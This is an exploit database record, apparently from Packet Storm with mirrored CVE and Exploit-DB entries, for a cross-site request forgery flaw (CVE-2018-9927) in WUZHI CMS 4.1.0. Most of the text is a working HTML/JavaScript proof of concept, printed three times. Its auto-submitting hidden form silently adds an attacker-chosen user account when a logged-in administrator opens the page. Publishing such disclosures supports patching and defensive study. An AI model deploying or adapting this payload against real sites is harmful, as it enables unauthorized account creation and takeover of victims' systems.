ID PACKETSTORM:147141
Type packetstorm
Reporter taoge
Modified 2018-04-11T00:00:00
Description
`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
`
{"enchantments": {"score": {"vector": "NONE", "value": 4.3}, "vulnersScore": 4.3}, "bulletinFamily": "exploit", "references": [], "href": "https://packetstormsecurity.com/files/147141/Wuzhi-CMS-4.1.0-Add-User-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:147141", "title": "Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery", "history": [], "type": "packetstorm", "cvss": {"score": 0.0, "vector": "NONE"}, "lastseen": "2018-04-12T01:03:53", "edition": 1, "hash": "4b7db13fe7f8373aa1eda66d9fd61be52e3c3e125006879790f37585ea9cc01c", "sourceHref": "https://packetstormsecurity.com/files/download/147141/wuzhicms410adduser-xsrf.txt", "objectVersion": "1.3", "reporter": "taoge", "description": "", "modified": "2018-04-11T00:00:00", "viewCount": 1, "published": "2018-04-11T00:00:00", "cvelist": ["CVE-2018-9927"], "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "017adfd7921d2986ad031dfe15802bfb"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "25e22c32f6582f0dbd71468a76bb1814"}, {"key": "modified", "hash": "e84cabaeeba4614cfe09db08c227bc9f"}, {"key": "published", "hash": "e84cabaeeba4614cfe09db08c227bc9f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "771388e6972a349a45c8a4550c40f6a2"}, {"key": "sourceData", "hash": "82b4acedd8c3174ba20494f8a4ff28d3"}, {"key": "sourceHref", "hash": "a6378e0291c68f9323aad6e0edaed0ac"}, {"key": "title", "hash": "be308de27609c4f1bb946229379cf2be"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "sourceData": "`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account \n# Date: 2018-04-10 \n# Exploit Author: taoge \n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms \n# Software Link: https://github.com/wuzhicms/wuzhicms \n# Version: 4.1.0 \n# CVE : CVE-2018-9927 \n \nAn issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4 \nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add. \nAfter the administrator logged in, open the csrf exp page. \n \n \n<html><body> \n<script type=\"text/javascript\"> \nfunction post(url,fields) \n{ \nvar p = document.createElement(\"form\"); \np.action = url; \np.innerHTML = fields; \np.target = \"_self\"; \np.method = \"post\"; \ndocument.body.appendChild(p); \np.submit(); \n} \nfunction csrf_hack() \n{ \nvar fields; \n \n \nfields += \"<input type='hidden' name='info[username]' value='hack123' />\"; \nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='avatar' value='' />\"; \nfields += \"<input type='hidden' name='islock' value='0' />\"; \nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \n \n \nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\"; \npost(url,fields); \n} \nwindow.onload = function() { csrf_hack();} \n</script> \n</body></html> \n \n \n`\n"}
{"cve": [{"lastseen": "2018-05-31T11:16:23", "references": ["https://github.com/wuzhicms/wuzhicms/issues/128", "http://www.iwantacve.cn/index.php/archives/7/"], "description": "An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.", "edition": 3, "reporter": "NVD", "published": "2018-04-10T02:29:00", "title": "CVE-2018-9927", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-9927"], "scanner": [], "modified": "2018-05-30T21:29:03", "cpe": ["cpe:/a:wuzhicms:wuzhicms:4.1.0"], "id": "CVE-2018-9927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9927", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-05-24T14:13:57", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User). Webapps exploit for PHP platform", "reporter": "Exploit-DB", "published": "2018-04-10T00:00:00", "type": "exploitdb", "title": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "enchantments": {"score": {"modified": "2018-05-24T14:13:57", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9927"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2018-04-10T00:00:00", "id": "EDB-ID:44440", "href": "https://www.exploit-db.com/exploits/44440/", "sourceData": "# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account\r\n# Date: 2018-04-10\r\n# Exploit Author: taoge\r\n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms\r\n# Software Link: https://github.com/wuzhicms/wuzhicms\r\n# Version: 4.1.0 \r\n# CVE : CVE-2018-9927\r\n \r\nAn issue was discovered in WUZHI CMS 4.1.0.\uff08https://github.com/wuzhicms/wuzhicms/issues/128\uff09\r\nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.\r\nAfter the administrator logged in, open the csrf exp page.\r\n \r\n \r\n<html><body>\r\n<script type=\"text/javascript\">\r\nfunction post(url,fields)\r\n{\r\nvar p = document.createElement(\"form\");\r\np.action = url;\r\np.innerHTML = fields;\r\np.target = \"_self\";\r\np.method = \"post\";\r\ndocument.body.appendChild(p);\r\np.submit();\r\n}\r\nfunction csrf_hack()\r\n{\r\nvar fields;\r\n\r\n\r\nfields += \"<input type='hidden' name='info[username]' value='hack123' />\";\r\nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \r\nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \r\nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \r\nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \r\nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \r\nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='avatar' value='' />\"; \r\nfields += \"<input type='hidden' name='islock' value='0' />\"; \r\nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \r\nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \r\nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \r\nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \r\nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \r\n\r\n\r\nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\";\r\npost(url,fields);\r\n}\r\nwindow.onload = function() { csrf_hack();}\r\n</script>\r\n</body></html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44440/"}]}
